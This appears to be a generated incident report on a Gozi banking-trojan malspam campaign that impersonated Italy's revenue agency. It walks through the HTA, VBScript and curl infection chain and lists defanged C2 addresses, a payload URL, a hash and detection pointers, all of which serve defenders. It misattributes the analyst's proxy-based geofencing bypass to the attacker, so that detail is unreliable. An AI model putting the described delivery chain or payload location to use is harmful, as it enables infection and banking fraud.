Full Report
Breakdown of a recent Gozi trojan Italian targeted campaign
Analysis Summary
# Incident Report: Gozi Botnet Campaign Targeting Italian Revenue Agency
## Executive Summary
A massive malspam campaign targeted individuals in Italy, impersonating the "Agenzia delle Entrate" (Italian Revenue Agency) to trick victims into downloading and executing malware, ultimately leading to the installation of the Gozi banking trojan. The attack utilized heavily obfuscated multi-stage execution chain beginning with an HTA attachment, culminating in the download of a final payload via an attacker-controlled C2 server. The primary impact appears to be the compromise of user systems for banking fraud facilitated by the Gozi malware.
## Incident Details
- **Discovery Date:** Not explicitly stated, but implied to be recent based on the campaign description.
- **Incident Date:** Occurred during a recent campaign targeting 2023 VAT documentation issues.
- **Affected Organization:** Individuals targeted by emails impersonating Agenzia delle Entrate (Italian Revenue Agency).
- **Sector:** Finance/Government Impersonation (targeting general populace).
- **Geography:** Italy.
## Timeline of Events
### Initial Access
- **Date/Time:** During the period of the malspam campaign.
- **Vector:** Malicious email attachment (Malspam).
- **Details:** Victims received emails impersonating Agenzia delle Entrate, citing VAT document inconsistencies, compelling users to open the attachment: `AgenziaEntrate.hta`.
### Lateral Movement
- Not detailed in the source material regarding extensive lateral movement *within* the network, but the execution chain shows dropping a secondary payload (`login.exe`) to `C:\Windows\System32\LogFiles\` indicating system persistence and command execution capability.
### Data Exfiltration/Impact
- The ultimate goal, as implied by the deployment of the **Gozi botnet**, is likely credential harvesting, banking fraud, and further data exfiltration.
### Detection & Response
- **How it was discovered:** Analysis of the malware chain by a security researcher/analyst.
- **Response actions taken:** The analyst recovered IOCs, detailed the multi-stage infection process, and documented the geofencing bypass technique. No organizational response actions from the victim side are detailed.
## Attack Methodology
- **Initial Access:** Malicious `.hta` (HTML Application) attachment sent via email, leveraging social engineering regarding tax documents.
- **Persistence:** The VBS portion of the script downloaded and saved a secondary payload (`login.exe`) to `%systemroot%\System32\LogFiles\`.
- **Privilege Escalation:** Not explicitly detailed, but deploying executables in system folders often requires elevated privileges or leveraging existing user permissions.
- **Defense Evasion:**
* **Obfuscation:** Heavy use of string escaping, URL decoding, and `jscript.encode` to hide the malicious code within the HTA file.
* **Geofencing Bypass:** The C2 server (IP: 191.101.2.39) likely checked the request origin. The attacker bypassed this by using the `-x` flag with `curl` through an Italian HTTP proxy to receive the anticipated payload (`installazione.exe`).
- **Credential Access:** The final payload is the Gozi trojan, known primarily for capturing banking credentials.
- **Discovery:** Initial reconnaissance involved analyzing the obfuscated HTA script contents.
- **Lateral Movement:** Not detailed.
- **Collection:** The final Gozi binary collects sensitive information.
- **Exfiltration:** Not detailed beyond the final malware being the Gozi trojan.
- **Impact:** Installation of Gozi botnet to facilitate financial fraud.
## Impact Assessment
- **Financial:** Potential financial loss due to banking trojan activity (Gozi). Specific costs not available.
- **Data Breach:** High risk of credential compromise (banking details, etc.).
- **Operational:** Infection of individual user endpoints.
- **Reputational:** Negative impact on the perceived security of the Agenzia delle Entrate due to impersonation.
## Indicators of Compromise
- **Network Indicators (Defanged):**
* C2 IP: `191[.]101[.]2[.]39`
* C2 IP: `62[.]173[.]141[.]252`
* C2 IP: `31[.]41[.]44[.]33`
* C2 IP: `109[.]248[.]11[.]112`
- **File Indicators:**
* Staging file: `AgenziaEntrate.hta` (SHA256: a3cec099b936e9f486de3b1492a81e55b17d5c2b06223f4256d49afc7bd212bc)
* Payload download URL: `http://191[.]101[.]2[.]39/installazione.exe`
* Dropped path/name: `%systemroot%\System32\LogFiles\login.exe`
* Final payload modules: `shellcode1.bin`, `shellcode2.bin`, `gozi loader.bin`, `gozi binary.bin`
- **Behavioral Indicators:**
* Use of highly obfuscated scripts including URL encoding, unicode escaping, and JScript.Encode.
* Execution chain involving VBScript to launch `curl` from the HTA process.
* Use of Italian proxies to bypass geographical restrictions on the C2 server.
## Response Actions
- **Containment measures:** Not detailed as this is a post-incident analysis, but immediate actions would involve isolating affected hosts and blocking C2 communications.
- **Eradication steps:** Removal of the dropped executables (`login.exe`) and the initial HTA/script files. Future eradication requires full system wipe/reimage if the final Gozi binary achieved deep persistence.
- **Recovery actions:** Resetting credentials accessed via the compromised device.
## Lessons Learned
- **Key takeaways:** Sophisticated, multi-layered obfuscation (escaping, URL decoding, JScript encoding) continues to be highly effective in bypassing static analysis of initial artifacts like HTA files.
- **What could have been done better:** Victims failed to adhere to security protocols regarding opening unsolicited attachments, especially those related to official government communications. Attackers actively test and bypass geopolitical geofencing mechanisms.
## Recommendations
- **Prevention measures for similar incidents:**
1. Implement stricter email gateway filtering to block `.hta` attachments, especially those containing script content.
2. Mandate credential and MFA usage for all financial/government portals to mitigate credential theft from banking Trojans like Gozi.
3. Conduct user training focused specifically on social engineering tactics impersonating tax/revenue agencies.
4. Monitor outbound network traffic for unusual `curl` usage originating from user endpoints, particularly when utilizing proxy arguments (`-x`).